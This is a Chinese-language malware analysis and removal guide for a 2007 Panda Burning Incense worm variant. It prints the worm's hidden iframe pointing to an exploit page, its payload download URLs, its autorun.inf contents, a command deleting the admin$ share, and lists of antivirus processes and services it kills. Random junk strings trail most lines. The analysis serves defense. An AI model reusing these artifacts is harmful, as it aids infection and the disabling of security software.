熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe eC"k-a8j+  
Sg
$\H  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） _Pno9|  
n}b{u@$  
中文名称：（尼姆亚，熊猫烧香） Nw9@
E R  
v%$l(  
病毒大小：68,570 字节 6cd!;Ca
 
idB1%?<  
编写语言：Borland Delphi 6.0 - 7.0 ;*'I&  
0C;Js\>3]  
加壳方式：FSG 2.0 -> bart/xt ~/X8Hy!-  
WMHYOJR  
发现时间：2007.1.16 (/At+MF3E  
^KdT,
^6T  
危害等级：高 v4Wq0>o  
&\I<j\F2/  
一、病毒描述： ber
&!9  
sj4\lpZ3h  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 \pk9i+t  
'<3h8\"  
二：中毒现象： X1d{7H8A2  
RP$h;0EQG  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 (kVY\!UAt  
J6[}o4Z  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 s>:gL,%c  
)H@<A93  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 ? V1ik[  
`v@Z|rv
,  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> D_?Tj  
'j*Q   
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 cHt4L]n8n  
i6P}MtC1  
6：不能正常使用任务管理器，SREng.exe等工具。 c&1_lI,tH  
BdMd\1eMw  
7：无故的向外发包，连接局域网中其他机器。 yKuZJXGVo  
$K+|bb  
三：技术分析 W**[:n+  
i3mw.`7  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe a_bZT4  
V,=5}qozQ  
建立注册表自启动项:  pdm(7^  
gxmo 1  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] unc6 V%  
tvf5b8(Y-  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" '.<iV!ZdZ  
O:8 u^TP  
2：查找反病毒窗体病毒结束相关进程: I{[}1W3]W  
>?OUs>}3y2  
天网防火墙 +L"F]_?  
b+q'xnA=>  
virusscan :!l.ze{F  
Y-Q)sv  
symantec antivirus mhv6.W@  
R<gAx
O%8  
system safety monitor .wp[uLE  
T59FRX  
system repair engineer ppRA%mhZ  
IP$eJL[&D"  
wrapped gift killer Xp|4WM  
b:'8_jL  
游戏木马检测大师 bDI

hI}P  
b$0;fEvIJn  
超级巡警 m' S{P:TK  
<mki@{;|  
3：结束以下进程: ]hy@5Jyh  
Xs|d#WbX  
mcshield.exe 
9{U@s  
lK/4"&  
vstskmgr.exe TghT{h@  
wLiPkW  
naprdmgr.exe 6W  
l%('5oz@\  
updaterui.exe c$)>$&([  
a * CXg.i  
tbmon.exe F'>yBDm*OM  
bf=\ED^  
scan32.exe H"A@Q.'  
~3Pp}eO~V  
ravmond.exe 6iXV  
'5*&  
ccenter.exe O"|d~VQ  
9015PEO  
ravtask.exe R\X;`ptT  
: O@(Sv  
rav.exe 8+7*> FD)1  
p<h(  
ravmon.exe -K$ugDi  
i;/;zG^=_  
ravmond.exe J=8Y D"1  
*Q?8OwhJ  
ravstub.exe t'J4zV  
rNicg]:\x  
kvxp.kxp
}+MA*v[06  
O(-6Zqk8Q  
kvmonxp.kxp b@=H$"  
z79oj\&[  
kvcenter.kxp tUZfQ  
pO fw *lD  
kvsrvxp.exe +:jv )4^O  
+A1*e+/b\  
kregex.exe N"RPCd_  
_*g
.U=u  
uihost.exe 3TeRZ=2:*x  
7&HcrkP]  
trojdie.kxp Gg GjB
t  
nLwfPj  
frogagent.exe 9ghUiBPiL:  
jA2%kX\6//  
kvxp.kxp ge%QbU1J  
"".a(ZGg  
kvmonxp.kxp  q^6#.}  
G(shZ=fq  
kvcenter.kxp .waj.9&[l  
R=48:XG3/K  
kvsrvxp.exe -OmpUv-O"  
+_vf=d  
kregex.exe x $[_Hix  
+\dKe[j{g  
uihost.exe 5kWzD'!^  
P_mP ^L  
trojdie.kxp fuCt9Kjo<  
}X=c|]6i^  
frogagent.exe UUbO\_&y  
_I3"35a  
logo1_.exe 9m_~Zs}Z  
khT[  
logo_1.exe #u+qV!4  
nFI<
Te^)  
rundl132.exe iqB%sIP  
lgK5E*^  
taskmgr.exe &;r'
JIp  
,JbP~2M~%  
msconfig.exe ob9od5Rf  
.q:6F*,1M  
regedit.exe  @e\ @EW  
^r(]S%  
sreng.exe v$JW7CKA  
4：禁用下列服务: _*{Lha  
H"Hl~~U  
schedule &w`Ho)P  
O8v9tGZoh  
sharedaccess <"3${'$k`  
,!,M'<?"  
rsccenter 1=9GV+`n  
CK|AXz+EN  
rsravmon cH:&S=>h  
-`z%<)!Y  
rsccenter ]mNsG0r6  
#4"eQ*.*"  
kvwsc x;} 25A|  
o /1+ }f  
kvsrvxp 1gt 7My  
xC0y2+)|  
kvwsc 8:*ZuR|~  
D^p)`*  
kvsrvxp &%)F5PT  
#D?w,<_8,  
kavsvc BNb_i H  
M0)0~#?.D  
avp hgDFhbHtd6  
@8a
V*zjB  
avp h -091N  
]:T:cO0_n  
kavsvc *A}td8(  
d1t_o2  
mcafeeframework q&NXF(  
E[zq<&P@  
mcshield kVt/Hhd9  
QGGBI Ku   
mctaskmanager dNqj|Vu  
ZZ :*c"b:  
mcafeeframework Fe$o*r,  
0(Z:QqpU$  
mcshield /P46k4M1U  
C8)s6  
mctaskmanager `fJ;4$4  
xdaq` ^Bbt  
navapsvc =JPY{'VO  
]]}iSw'  
wscsvc 'Ce?!UO  
\'('HFr,  
kpfwsvc R*k;4*1u  
$/(``8li_  
sndsrvc Hv:~)h$  
#(a;w  
ccproxy ? IlT[yMw  
`jhbKgR[  
ccevtmgr 10r!p:D  
@(N} {om  
ccsetmgr LL+_zBP.  
ma
QxU(  
spbbcsvc n
? =O@yq  
\S?-[v*{  
symantec core lc 4W E)2vkS  
ZdPqU\G^q  
npfmntor +~,q"
6  
zA$ f$J7\^  
mskservice Z R~2Y?Wt9  
e~,+rM  
firesvc P+_1*lOG  
Wap\J7NY  
5：删除下列注册表项: XMxm2-%olP  
T0b/txS  
software\microsoft\windows\currentversion\run\ravtask P9S)7&+DL  
A5%Now;.cf  
software\microsoft\windows\currentversion\run\kvmonxp ":=h1AJY  
mT|r:Yr:  
software\microsoft\windows\currentversion\run\kav y0) mBCX  
+J A\by  
software\microsoft\windows\currentversion\run\kavpersonal50 UxMei  
H3iYE~^#  
software\microsoft\windows\currentversion\run\mcafeeupdaterui d5{RIM|  
Gtv
bm  
software\microsoft\windows\currentversion\run\network associates error reporting service '*&V7:  
heb{i5el  
software\microsoft\windows\currentversion\run\shstatexe UQ)^`Zj  
_KyhX|  
software\microsoft\windows\currentversion\run\ylive.exe 7<2^8`  
0dD.xuor  
software\microsoft\windows\currentversion\run\yassistse q8R,#\T*  
#W_-S0>&  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） q"f7$  
Go]y{9+(7  
7：跳过下列目录: ?01ru5ys/o  
C&EA@U5X^  
windows n#4T o;CS  
ye}86{l  
winnt 4Y G\<Zf  
6aWnj*dF  
systemvolumeinformation bpDlFa  
\"5p)(  
recycled lm+s5}*%o  
M3JV^{O/DV  
windowsnt ,d^HAg^j  
)hVn/*mH  
windowsupdate onv0gb/J  
9%MgAik(  
windowsmediaplayer DoICf1  
i"4;{C{s  
outlookexpress R"z}q(O:  
yU~wZjw  
netmeeting e_S,N0  
#.,LWL]  
commonfiles N~?#Qh|ZnU  
"412w^5[T  
complusapplications }%y5<n*v\  
nLrCy5R:  
commonfiles &C?4'e  
c;#gvE  
messenger 6mxzE3?G  
(H]NL  
installshieldinstallationinformation CRNt5T>qH  
T*(mi{[T  
msn 4P7r\hs  
cF"}}c1*M  
microsoftfrontpage =C7<I   
.lSoC`HE  
moviemaker nH+wU;M  
I&% Z*H  
msngaminzone ow'CwOj$  
WZviC_
 
8：删除*.gho备份文件. 'PTQ S,E  
sM9
utR  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. xd
4~[n\hm  
1T4#+kW&  
autorun.inf内容： ?ihRt+eR~  
M~.1:%khM  
程序代码 TFXKCl  
1>bNw-kz7  
[AutoRun] @F|pKf:M+  
F84<='K  
OPEN=setup.exe j:HIcCp  
xo!2GPD.  
shellexecute=setup.exe (L W2S;-  
"z*?#&?,  
shell\Auto\command=setup.exe rX?%{M,xFw  
c+##!_[9  
10：删除共享：cmd.exe /c net share admin$ /del /y wF*9%K'E  
kJCeQK:W  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 wxF\enDY  
#9HX"<5  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 g6OPYUPg  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 {m_y<  
7T(&DOGZ  
目前下载列表如下： S>s+ nqcP  
g$Jlp
D&  
http://www.krvkr.com/down/cq.exe 
e?KzT5j:  
Ns\};j?TU*  
http://www.krvkr.com/down/mh.exe }>b@=5O  
p?4,YV|#  
http://www.krvkr.com/down/my.exe CsjrQ-#9yn  
`~NjBtQ  
http://www.krvkr.com/down/wl.exe
Q&w"!N  
,}l|_GGj  
http://www.krvkr.com/down/rx.exe @z`eqG,']  
9&Z+K'$=  
http://www.krvkr.com/down/wow.exe KC8  
#[Rs&$vQm  
http://www.krvkr.com/down/zt.exe s#Xfu\CP  
_]L]_Bh  
http://www.krvkr.com/down/wm.exe R_ )PbFw  
V \/Qik{h  
http://www.krvkr.com/down/dj.exe h%sw^;\!  
I |"
'  
http://www.krvkr.com/cn/iechajian.exe I[n|#N  
^AoX|R[1%  
到此病毒行为分析完毕。 *qFl&*h}  
y=AF EP  
四：Sec120.Com专家解决方案： N7_(,Gu*R  
j_z@VT}y  
1：关闭网络共享，断开网络。 CXTtN9N9  
dt/-0~U  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） Z=]ujlD  
g`)0 wP  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 ;/)$Cm&e  
@S6@pMo,  
4：删除注册表启动项 C* 0ZF  
7R,;/3wWjG  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] ^4et; F%  
|+qsO;  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 35:R
sL  
moZeP#Q%  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe u~~ ~@p  

{~XAg~  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 I6,||!sZ  
|\94a  
7：如果电脑上有脚本文件，将病毒代码全部删除。 0IBQE  
&}\{qFD;  
8：关闭系统的自动播放功能。 "6v_<t`q"  
=,X*40=  
这样就基本上将病毒清除了